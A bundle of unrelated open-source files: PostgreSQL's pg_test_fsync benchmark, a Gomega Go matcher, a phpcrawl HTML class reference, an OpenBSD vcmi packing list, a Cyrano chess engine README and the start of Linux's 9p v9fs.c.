static int pg_fsync_writethrough(int fd);
#endif
static void print_elapse(struct timeval start_t, struct timeval stop_t, int ops);
#define die(msg) do { pg_log_error("%s: %m", _(msg)); exit(1); } while(0)
int
main(int argc, char *argv[])
{
pg_logging_init(argv[0]);
set_pglocale_pgservice(argv[0], PG_TEXTDOMAIN("pg_test_fsync"));
progname = get_progname(argv[0]);
handle_args(argc, argv);
/* Prevent leaving behind the test file */
pqsignal(SIGINT, signal_cleanup);
pqsignal(SIGTERM, signal_cleanup);
#ifndef WIN32
pqsignal(SIGALRM, process_alarm);
#endif
#ifdef SIGHUP
/* Not defined on win32 */
pqsignal(SIGHUP, signal_cleanup);
#endif
prepare_buf();
test_open();
/* Test using 1 XLOG_BLCKSZ write */
test_sync(1);
/* Test using 2 XLOG_BLCKSZ writes */
test_sync(2);
test_open_syncs();
test_file_descriptor_sync();
test_non_sync();
unlink(filename);
return 0;
}
static void
handle_args(int argc, char *argv[])
{
static struct option long_options[] = {
{"filename", required_argument, NULL, 'f'},
{"secs-per-test", required_argument, NULL, 's'},
{NULL, 0, NULL, 0}
};
int option; /* Command line option */
int optindex = 0; /* used by getopt_long */
unsigned long optval; /* used for option parsing */
char *endptr;
if (argc > 1)
{
if (strcmp(argv[1], "--help") == 0 || strcmp(argv[1], "-?") == 0)
{
printf(_("Usage: %s [-f FILENAME] [-s SECS-PER-TEST]\n"), progname);
exit(0);
}
if (strcmp(argv[1], "--version") == 0 || strcmp(argv[1], "-V") == 0)
{
puts("pg_test_fsync (PostgreSQL) " PG_VERSION);
exit(0);
}
}
while ((option = getopt_long(argc, argv, "f:s:",
long_options, &optindex)) != -1)
{
switch (option)
{
case 'f':
filename = pg_strdup(optarg);
break;
case 's':
errno = 0;
optval = strtoul(optarg, &endptr, 10);
if (endptr == optarg || *endptr != '\0' ||
errno != 0 || optval != (unsigned int) optval)
{
pg_log_error("invalid argument for option %s", "--secs-per-test");
fprintf(stderr, _("Try \"%s --help\" for more information.\n"), progname);
exit(1);
}
secs_per_test = (unsigned int) optval;
if (secs_per_test == 0)
{
pg_log_error("%s must be in range %u..%u",
"--secs-per-test", 1, UINT_MAX);
exit(1);
}
break;
default:
fprintf(stderr, _("Try \"%s --help\" for more information.\n"),
progname);
exit(1);
break;
}
}
if (argc > optind)
{
pg_log_error("too many command-line arguments (first is \"%s\")",
argv[optind]);
fprintf(stderr, _("Try \"%s --help\" for more information.\n"),
progname);
exit(1);
}
printf(ngettext("%u second per test\n",
"%u seconds per test\n",
secs_per_test),
secs_per_test);
#if PG_O_DIRECT != 0
printf(_("O_DIRECT supported on this platform for open_datasync and open_sync.\n"));
#else
printf(_("Direct I/O is not supported on this platform.\n"));
#endif
}
static void
prepare_buf(void)
{
int ops;
/* write random data into buffer */
for (ops = 0; ops < DEFAULT_XLOG_SEG_SIZE; ops++)
full_buf[ops] = random();
buf = (char *) TYPEALIGN(XLOG_BLCKSZ, full_buf);
}
static void
test_open(void)
{
int tmpfile;
/*
* test if we can open the target file
*/
if ((tmpfile = open(filename, O_RDWR | O_CREAT | PG_BINARY, S_IRUSR | S_IWUSR)) == -1)
die("could not open output file");
needs_unlink = 1;
if (write(tmpfile, full_buf, DEFAULT_XLOG_SEG_SIZE) !=
DEFAULT_XLOG_SEG_SIZE)
die("write failed");
/* fsync now so that dirty buffers don't skew later tests */
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
}
static void
test_sync(int writes_per_op)
{
int tmpfile,
ops,
writes;
bool fs_warning = false;
if (writes_per_op == 1)
printf(_("\nCompare file sync methods using one %dkB write:\n"), XLOG_BLCKSZ_K);
else
printf(_("\nCompare file sync methods using two %dkB writes:\n"), XLOG_BLCKSZ_K);
printf(_("(in wal_sync_method preference order, except fdatasync is Linux's default)\n"));
/*
* Test open_datasync if available
*/
printf(LABEL_FORMAT, "open_datasync");
fflush(stdout);
#ifdef OPEN_DATASYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | O_DSYNC | PG_O_DIRECT | PG_BINARY, 0)) == -1)
{
printf(NA_FORMAT, _("n/a*"));
fs_warning = true;
}
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test fdatasync if available
*/
printf(LABEL_FORMAT, "fdatasync");
fflush(stdout);
#ifdef HAVE_FDATASYNC
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
fdatasync(tmpfile);
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test fsync
*/
printf(LABEL_FORMAT, "fsync");
fflush(stdout);
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (fsync(tmpfile) != 0)
die("fsync failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
/*
* If fsync_writethrough is available, test as well
*/
printf(LABEL_FORMAT, "fsync_writethrough");
fflush(stdout);
#ifdef HAVE_FSYNC_WRITETHROUGH
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (pg_fsync_writethrough(tmpfile) != 0)
die("fsync failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
#else
printf(NA_FORMAT, _("n/a"));
#endif
/*
* Test open_sync if available
*/
printf(LABEL_FORMAT, "open_sync");
fflush(stdout);
#ifdef OPEN_SYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | OPEN_SYNC_FLAG | PG_O_DIRECT | PG_BINARY, 0)) == -1)
{
printf(NA_FORMAT, _("n/a*"));
fs_warning = true;
}
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < writes_per_op; writes++)
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
/*
* This can generate write failures if the filesystem has
* a large block size, e.g. 4k, and there is no support
* for O_DIRECT writes smaller than the file system block
* size, e.g. XFS.
*/
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
if (fs_warning)
{
printf(_("* This file system and its mount options do not support direct\n"
" I/O, e.g. ext4 in journaled mode.\n"));
}
}
static void
test_open_syncs(void)
{
printf(_("\nCompare open_sync with different write sizes:\n"));
printf(_("(This is designed to compare the cost of writing 16kB in different write\n"
"open_sync sizes.)\n"));
test_open_sync(_(" 1 * 16kB open_sync write"), 16);
test_open_sync(_(" 2 * 8kB open_sync writes"), 8);
test_open_sync(_(" 4 * 4kB open_sync writes"), 4);
test_open_sync(_(" 8 * 2kB open_sync writes"), 2);
test_open_sync(_("16 * 1kB open_sync writes"), 1);
}
/*
* Test open_sync with different size files
*/
static void
test_open_sync(const char *msg, int writes_size)
{
#ifdef OPEN_SYNC_FLAG
int tmpfile,
ops,
writes;
#endif
printf(LABEL_FORMAT, msg);
fflush(stdout);
#ifdef OPEN_SYNC_FLAG
if ((tmpfile = open(filename, O_RDWR | OPEN_SYNC_FLAG | PG_O_DIRECT | PG_BINARY, 0)) == -1)
printf(NA_FORMAT, _("n/a*"));
else
{
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
for (writes = 0; writes < 16 / writes_size; writes++)
if (write(tmpfile, buf, writes_size * 1024) !=
writes_size * 1024)
die("write failed");
if (lseek(tmpfile, 0, SEEK_SET) == -1)
die("seek failed");
}
STOP_TIMER;
close(tmpfile);
}
#else
printf(NA_FORMAT, _("n/a"));
#endif
}
static void
test_file_descriptor_sync(void)
{
int tmpfile,
ops;
/*
* Test whether fsync can sync data written on a different descriptor for
* the same file. This checks the efficiency of multi-process fsyncs
* against the same file. Possibly this should be done with writethrough
* on platforms which support it.
*/
printf(_("\nTest if fsync on non-write file descriptor is honored:\n"));
printf(_("(If the times are similar, fsync() can sync data written on a different\n"
"descriptor.)\n"));
/*
* first write, fsync and close, which is the normal behavior without
* multiple descriptors
*/
printf(LABEL_FORMAT, "write, fsync, close");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
/*
* open and close the file again to be consistent with the following
* test
*/
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
close(tmpfile);
}
STOP_TIMER;
/*
* Now open, write, close, open again and fsync. This simulates processes
* fsyncing each other's writes.
*/
printf(LABEL_FORMAT, "write, close, fsync");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
close(tmpfile);
/* reopen file */
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (fsync(tmpfile) != 0)
die("fsync failed");
close(tmpfile);
}
STOP_TIMER;
}
static void
test_non_sync(void)
{
int tmpfile,
ops;
/*
* Test a simple write without fsync
*/
printf(_("\nNon-sync'ed %dkB writes:\n"), XLOG_BLCKSZ_K);
printf(LABEL_FORMAT, "write");
fflush(stdout);
START_TIMER;
for (ops = 0; alarm_triggered == false; ops++)
{
if ((tmpfile = open(filename, O_RDWR | PG_BINARY, 0)) == -1)
die("could not open output file");
if (write(tmpfile, buf, XLOG_BLCKSZ) != XLOG_BLCKSZ)
die("write failed");
close(tmpfile);
}
STOP_TIMER;
}
static void
signal_cleanup(int signum)
{
/* Delete the file if it exists. Ignore errors */
if (needs_unlink)
unlink(filename);
/* Finish incomplete line on stdout */
puts("");
exit(signum);
}
#ifdef HAVE_FSYNC_WRITETHROUGH
static int
pg_fsync_writethrough(int fd)
{
#ifdef WIN32
return _commit(fd);
#elif defined(F_FULLFSYNC)
return (fcntl(fd, F_FULLFSYNC, 0) == -1) ? -1 : 0;
#else
errno = ENOSYS;
return -1;
#endif
}
#endif
/*
* print out the writes per second for tests
*/
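/*
* Worked example (hypothetical numbers, not measured output): if ops = 10000
* operations complete during a 5.0 second window, the code below prints
* 10000 / 5.0 = 2000.000 ops/sec and (5.0 / 10000) * USECS_SEC = 500 usecs/op.
*/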
static void
print_elapse(struct timeval start_t, struct timeval stop_t, int ops)
{
double total_time = (stop_t.tv_sec - start_t.tv_sec) +
(stop_t.tv_usec - start_t.tv_usec) * 0.000001;
double per_second = ops / total_time;
double avg_op_time_us = (total_time / ops) * USECS_SEC;
printf(_(OPS_FORMAT), per_second, avg_op_time_us);
}
#ifndef WIN32
static void
process_alarm(int sig)
{
alarm_triggered = true;
}
#else
static DWORD WINAPI
process_alarm(LPVOID param)
{
/* WIN32 doesn't support alarm, so we create a thread and sleep here */
Sleep(secs_per_test * 1000);
alarm_triggered = true;
ExitThread(0);
}
#endif
| {
"pile_set_name": "Github"
} |
package matchers
import (
"fmt"
"github.com/onsi/gomega/format"
"github.com/onsi/gomega/internal/oraclematcher"
"github.com/onsi/gomega/types"
)
type OrMatcher struct {
Matchers []types.GomegaMatcher
// state
firstSuccessfulMatcher types.GomegaMatcher
}
func (m *OrMatcher) Match(actual interface{}) (success bool, err error) {
m.firstSuccessfulMatcher = nil
for _, matcher := range m.Matchers {
success, err := matcher.Match(actual)
if err != nil {
return false, err
}
if success {
m.firstSuccessfulMatcher = matcher
return true, nil
}
}
return false, nil
}
func (m *OrMatcher) FailureMessage(actual interface{}) (message string) {
// not the most beautiful list of matchers, but not bad either...
return format.Message(actual, fmt.Sprintf("To satisfy at least one of these matchers: %s", m.Matchers))
}
func (m *OrMatcher) NegatedFailureMessage(actual interface{}) (message string) {
return m.firstSuccessfulMatcher.NegatedFailureMessage(actual)
}
func (m *OrMatcher) MatchMayChangeInTheFuture(actual interface{}) bool {
/*
Example with 3 matchers: A, B, C
Match evaluates them: F, T, <?> => T
So match is currently T, what should MatchMayChangeInTheFuture() return?
Seems like it only depends on B, since currently B MUST change to allow the result to become F
Match eval: F, F, F => F
So match is currently F, what should MatchMayChangeInTheFuture() return?
Seems to depend on ANY of them being able to change to T.
*/
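// Illustrative sketch (matchers A, B, C and "actual" are hypothetical, mirroring
// the reasoning above; this is not part of gomega's API surface):
//
//   m := &OrMatcher{Matchers: []types.GomegaMatcher{A, B, C}}
//   ok, _ := m.Match(actual)                 // e.g. A fails, B succeeds -> ok == true
//   _ = m.MatchMayChangeInTheFuture(actual)  // only B's ability to change matters now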
if m.firstSuccessfulMatcher != nil {
// one of the matchers succeeded.. it must be able to change in order to affect the result
return oraclematcher.MatchMayChangeInTheFuture(m.firstSuccessfulMatcher, actual)
} else {
// so all matchers failed.. Any one of them changing would change the result.
for _, matcher := range m.Matchers {
if oraclematcher.MatchMayChangeInTheFuture(matcher, actual) {
return true
}
}
return false // none of them was going to change
}
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>Project Documentation / Classreference</title><meta
name="keywords" content="framework, API, manual, class reference, classreference, documentation" /><meta
name="description" content="The class reference contains the detailed description of how to use every class, method, and property." /><link
rel="stylesheet" type="text/css" media="screen" href="style.css"> <script name="javascript">function show_hide_examples()
{if(document.getElementById("examples").style.display=="none")
{document.getElementById("examples").style.display="";}
else
{document.getElementById("examples").style.display="none";}}</script> </head><body><div
id="outer"><h1>
<span>
Class:
PHPCrawlerResponseHeader
</span></h1><h2 id="head"><table
id="head_table"><tr><td
width="1%"><b>Author:</b></td><td
width="49%">-</td><td
width="1%"><b>Version:</b></td><td
width="49%">-</td></tr><tr><td
width="1%"><b>Package:</b></td><td
width="49%">phpcrawl</td><td
width="1%"><b>Category:</b></td><td
width="49%">-</td></tr></table></h2><div
id="section">Describes an HTTP response-header within the phpcrawl-system.</div><div
id="section">
<b>Description:</b><p>
-</p></div><div
id="section">
<b>Members:</b><p><table
id="method_list"><tr><th
colspan="3">Public Properties</th></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_encoding.htm" ><nobr>content_encoding</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-encoding as stated in the header.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_length.htm" ><nobr>content_length</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-length as stated in the header.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_content_type.htm" ><nobr>content_type</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The content-type</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_cookies.htm" ><nobr>cookies</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">All cookies found in the header</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_header_raw.htm" ><nobr>header_raw</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The raw HTTP-header as it was send by the server</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_http_status_code.htm" ><nobr>http_status_code</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The HTTP-statuscode</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_source_url.htm" ><nobr>source_url</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The URL of the website the header was recevied from.</td></tr><tr><td
width="25%"> <a
href="property_detail_tpl_property_transfer_encoding.htm" ><nobr>transfer_encoding</nobr></a></td><td
width="3%"><b></b></td><td
width="72%">The transfer-encoding as stated in the header.</td></tr></table><br></p></div><div
id="footer">Docs created with <a
href="http://phpclassview.cuab.de" target="_parent">PhpClassView</a></div></div></body></html> | {
"pile_set_name": "Github"
} |
@comment $OpenBSD$
bin/vcmibuilder
@bin bin/vcmiclient
@bin bin/vcmiserver
include/fl/
include/fl/Console.h
include/fl/Engine.h
include/fl/Exception.h
include/fl/Headers.h
include/fl/Operation.h
include/fl/defuzzifier/
include/fl/defuzzifier/Bisector.h
include/fl/defuzzifier/Centroid.h
include/fl/defuzzifier/Defuzzifier.h
include/fl/defuzzifier/IntegralDefuzzifier.h
include/fl/defuzzifier/LargestOfMaximum.h
include/fl/defuzzifier/MeanOfMaximum.h
include/fl/defuzzifier/SmallestOfMaximum.h
include/fl/defuzzifier/WeightedAverage.h
include/fl/defuzzifier/WeightedDefuzzifier.h
include/fl/defuzzifier/WeightedSum.h
include/fl/factory/
include/fl/factory/CloningFactory.h
include/fl/factory/ConstructionFactory.h
include/fl/factory/DefuzzifierFactory.h
include/fl/factory/FactoryManager.h
include/fl/factory/FunctionFactory.h
include/fl/factory/HedgeFactory.h
include/fl/factory/SNormFactory.h
include/fl/factory/TNormFactory.h
include/fl/factory/TermFactory.h
include/fl/fuzzylite.h
include/fl/hedge/
include/fl/hedge/Any.h
include/fl/hedge/Extremely.h
include/fl/hedge/Hedge.h
include/fl/hedge/Not.h
include/fl/hedge/Seldom.h
include/fl/hedge/Somewhat.h
include/fl/hedge/Very.h
include/fl/imex/
include/fl/imex/CppExporter.h
include/fl/imex/Exporter.h
include/fl/imex/FclExporter.h
include/fl/imex/FclImporter.h
include/fl/imex/FisExporter.h
include/fl/imex/FisImporter.h
include/fl/imex/FldExporter.h
include/fl/imex/FllExporter.h
include/fl/imex/FllImporter.h
include/fl/imex/Importer.h
include/fl/imex/JavaExporter.h
include/fl/norm/
include/fl/norm/Norm.h
include/fl/norm/SNorm.h
include/fl/norm/TNorm.h
include/fl/norm/s/
include/fl/norm/s/AlgebraicSum.h
include/fl/norm/s/BoundedSum.h
include/fl/norm/s/DrasticSum.h
include/fl/norm/s/EinsteinSum.h
include/fl/norm/s/HamacherSum.h
include/fl/norm/s/Maximum.h
include/fl/norm/s/NilpotentMaximum.h
include/fl/norm/s/NormalizedSum.h
include/fl/norm/t/
include/fl/norm/t/AlgebraicProduct.h
include/fl/norm/t/BoundedDifference.h
include/fl/norm/t/DrasticProduct.h
include/fl/norm/t/EinsteinProduct.h
include/fl/norm/t/HamacherProduct.h
include/fl/norm/t/Minimum.h
include/fl/norm/t/NilpotentMinimum.h
include/fl/rule/
include/fl/rule/Antecedent.h
include/fl/rule/Consequent.h
include/fl/rule/Expression.h
include/fl/rule/Rule.h
include/fl/rule/RuleBlock.h
include/fl/term/
include/fl/term/Accumulated.h
include/fl/term/Activated.h
include/fl/term/Bell.h
include/fl/term/Concave.h
include/fl/term/Constant.h
include/fl/term/Cosine.h
include/fl/term/Discrete.h
include/fl/term/Function.h
include/fl/term/Gaussian.h
include/fl/term/GaussianProduct.h
include/fl/term/Linear.h
include/fl/term/PiShape.h
include/fl/term/Ramp.h
include/fl/term/Rectangle.h
include/fl/term/SShape.h
include/fl/term/Sigmoid.h
include/fl/term/SigmoidDifference.h
include/fl/term/SigmoidProduct.h
include/fl/term/Spike.h
include/fl/term/Term.h
include/fl/term/Trapezoid.h
include/fl/term/Triangle.h
include/fl/term/ZShape.h
include/fl/variable/
include/fl/variable/InputVariable.h
include/fl/variable/OutputVariable.h
include/fl/variable/Variable.h
lib/libfuzzylite-static.a
lib/vcmi/
lib/vcmi/AI/
lib/vcmi/AI/libBattleAI.so
lib/vcmi/AI/libEmptyAI.so
lib/vcmi/AI/libStupidAI.so
lib/vcmi/AI/libVCAI.so
lib/vcmi/libminizip.so
@lib lib/vcmi/libvcmi.so.${LIBvcmi_VERSION}
share/applications/vcmiclient.desktop
share/doc/pkg-readmes/${FULLPKGNAME}
share/icons/hicolor/256x256/apps/vcmiclient.png
share/icons/hicolor/32x32/apps/vcmiclient.png
share/icons/hicolor/48x48/apps/vcmiclient.png
share/icons/hicolor/64x64/apps/vcmiclient.png
share/vcmi/
share/vcmi/Mods/
share/vcmi/Mods/vcmi/
share/vcmi/Mods/vcmi/Data/
share/vcmi/Mods/vcmi/Data/StackQueueLarge.png
share/vcmi/Mods/vcmi/Data/StackQueueSmall.png
share/vcmi/Mods/vcmi/Data/questDialog.png
share/vcmi/Mods/vcmi/Data/s/
@comment share/vcmi/Mods/vcmi/Data/s/std.verm
share/vcmi/Mods/vcmi/Data/s/std.verm
@comment share/vcmi/Mods/vcmi/Data/s/testy.erm
share/vcmi/Mods/vcmi/Data/s/testy.erm
share/vcmi/Mods/vcmi/Data/stackWindow/
share/vcmi/Mods/vcmi/Data/stackWindow/bonus-effects.png
share/vcmi/Mods/vcmi/Data/stackWindow/button-panel.png
share/vcmi/Mods/vcmi/Data/stackWindow/commander-abilities.png
share/vcmi/Mods/vcmi/Data/stackWindow/commander-bg.png
share/vcmi/Mods/vcmi/Data/stackWindow/icons.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-0.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-1.png
share/vcmi/Mods/vcmi/Data/stackWindow/info-panel-2.png
share/vcmi/Mods/vcmi/Data/stackWindow/spell-effects.png
share/vcmi/Mods/vcmi/Sprites/
share/vcmi/Mods/vcmi/Sprites/PortraitsLarge.json
share/vcmi/Mods/vcmi/Sprites/PortraitsSmall.json
share/vcmi/Mods/vcmi/Sprites/ScSelC.json
share/vcmi/Mods/vcmi/Sprites/buttons/
share/vcmi/Mods/vcmi/Sprites/buttons/commander.json
share/vcmi/Mods/vcmi/Sprites/buttons/commanderNormal.png
share/vcmi/Mods/vcmi/Sprites/buttons/commanderPressed.png
share/vcmi/Mods/vcmi/Sprites/buttons/resolution.json
share/vcmi/Mods/vcmi/Sprites/buttons/resolutionNormal.png
share/vcmi/Mods/vcmi/Sprites/buttons/resolutionPressed.png
share/vcmi/Mods/vcmi/Sprites/itpa.json
share/vcmi/Mods/vcmi/Sprites/mapFormatIcons/
share/vcmi/Mods/vcmi/Sprites/mapFormatIcons/vcmi1.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancel-normal.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancel-pressed.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/cancelButton.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-0.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-1.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-10.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-2.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-3.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-4.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-5.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-6.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-7.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-8.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/level-9.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/levels.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/switchModeIcons.json
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgrade-normal.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgrade-pressed.png
share/vcmi/Mods/vcmi/Sprites/stackWindow/upgradeButton.json
share/vcmi/Mods/vcmi/mod.json
share/vcmi/config/
share/vcmi/config/ERMU_to_picture.json
share/vcmi/config/NEUTRAL.PAL
share/vcmi/config/artifacts.json
share/vcmi/config/battleStartpos.json
share/vcmi/config/battles_graphics.json
share/vcmi/config/bonuses.json
share/vcmi/config/bonuses_texts.json
share/vcmi/config/buildings5.json
share/vcmi/config/campaignMedia.json
share/vcmi/config/campaignSets.json
share/vcmi/config/campaign_regions.json
share/vcmi/config/commanders.json
share/vcmi/config/creatures/
share/vcmi/config/creatures/castle.json
share/vcmi/config/creatures/conflux.json
share/vcmi/config/creatures/dungeon.json
share/vcmi/config/creatures/fortress.json
share/vcmi/config/creatures/inferno.json
share/vcmi/config/creatures/necropolis.json
share/vcmi/config/creatures/neutral.json
share/vcmi/config/creatures/rampart.json
share/vcmi/config/creatures/special.json
share/vcmi/config/creatures/stronghold.json
share/vcmi/config/creatures/tower.json
share/vcmi/config/defaultMods.json
share/vcmi/config/factions/
share/vcmi/config/factions/castle.json
share/vcmi/config/factions/conflux.json
share/vcmi/config/factions/dungeon.json
share/vcmi/config/factions/fortress.json
share/vcmi/config/factions/inferno.json
share/vcmi/config/factions/necropolis.json
share/vcmi/config/factions/neutral.json
share/vcmi/config/factions/rampart.json
share/vcmi/config/factions/stronghold.json
share/vcmi/config/factions/tower.json
share/vcmi/config/filesystem.json
share/vcmi/config/fonts.json
share/vcmi/config/gameConfig.json
share/vcmi/config/heroClasses.json
share/vcmi/config/heroes/
share/vcmi/config/heroes/castle.json
share/vcmi/config/heroes/conflux.json
share/vcmi/config/heroes/dungeon.json
share/vcmi/config/heroes/fortress.json
share/vcmi/config/heroes/inferno.json
share/vcmi/config/heroes/necropolis.json
share/vcmi/config/heroes/rampart.json
share/vcmi/config/heroes/special.json
share/vcmi/config/heroes/stronghold.json
share/vcmi/config/heroes/tower.json
share/vcmi/config/mainmenu.json
share/vcmi/config/mapOverrides.json
share/vcmi/config/objects/
share/vcmi/config/objects/creatureBanks.json
share/vcmi/config/objects/dwellings.json
share/vcmi/config/objects/generic.json
share/vcmi/config/objects/moddables.json
share/vcmi/config/objects/rewardable.json
share/vcmi/config/obstacles.json
share/vcmi/config/resolutions.json
share/vcmi/config/resources.json
share/vcmi/config/schemas/
share/vcmi/config/schemas/artifact.json
share/vcmi/config/schemas/bonus.json
share/vcmi/config/schemas/creature.json
share/vcmi/config/schemas/faction.json
share/vcmi/config/schemas/hero.json
share/vcmi/config/schemas/heroClass.json
share/vcmi/config/schemas/mapHeader.json
share/vcmi/config/schemas/mod.json
share/vcmi/config/schemas/object.json
share/vcmi/config/schemas/objectTemplate.json
share/vcmi/config/schemas/objectType.json
share/vcmi/config/schemas/settings.json
share/vcmi/config/schemas/spell.json
share/vcmi/config/schemas/template.json
share/vcmi/config/schemas/townBuilding.json
share/vcmi/config/schemas/townSiege.json
share/vcmi/config/schemas/townStructure.json
share/vcmi/config/sp_sounds.json
share/vcmi/config/spells/
share/vcmi/config/spells/ability.json
share/vcmi/config/spells/adventure.json
share/vcmi/config/spells/offensive.json
share/vcmi/config/spells/other.json
share/vcmi/config/spells/timed.json
share/vcmi/config/startres.json
share/vcmi/config/terrainViewPatterns.json
share/vcmi/config/terrains.json
share/vcmi/config/translate.json
@exec %D/bin/update-desktop-database
@unexec-delete %D/bin/update-desktop-database
@exec %D/bin/gtk-update-icon-cache -q -t %D/share/icons/hicolor
@unexec-delete %D/bin/gtk-update-icon-cache -q -t %D/share/icons/hicolor
| {
"pile_set_name": "Github"
} |
Cyrano v 0.1 is derived from Gerbil
Cyrano is compatible with Winboard 2 & UCI protocol
Default hash size is 128 MB
Default book name is test.pbk (PolyGlot format)
Command line arguments :
Usage: cyrano [flags]
-? | Usage
-bf<F> | name of the opening book to use
-ht<N> | size of the transposition tables in MB (default=32)
-bs<F> | name of the directory of the Scorpio bitbases
-hp<N> | size of the pawn hash table in bytes
-p | Tell the engine to reduce its system priority.
-r<B> | {0 | 1} disable or enable the auto resign feature
-t<F> <N> | Profile a position for N seconds, F is the FEN string
-b<B> | {0 | 1} disable or enable the use of an opening book
example : "Cyrano.exe -ht 128 -bs c:/tb/egbbs_3_4"
Copyrights
----------
Gerbil Copyright (c) 2001, Bruce Moreland. All rights reserved.
magicmoves Copyright (C) 2007 Pradyumna Kannan.
move gen (c) Jacob Hales
Cyrano Copyright (c) 2007 Harald JOHNSEN
PolyGlot Copyright 2004-2006 Fabien Letouzey.
Bitbases Scorpio bitbases from Daniel Shawul
| {
"pile_set_name": "Github"
} |
/*
* linux/fs/9p/v9fs.c
*
* This file contains functions assisting in mapping VFS to 9P2000
*
* Copyright (C) 2004-2008 by Eric Van Hensbergen <[email protected]>
* Copyright (C) 2002 by Ron Minnich <[email protected]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to:
* Free Software Foundation
* 51 Franklin Street, Fifth Floor
* Boston, MA 02111-1301 USA
*
*/
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
#include <linux/module.h>
#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/sched.h>
#include <linux/parser.h>
#include <linux/idr.h>
#include <linux/slab.h>
#include <net/9p/9p.h>
#include <net/9p/client.h>
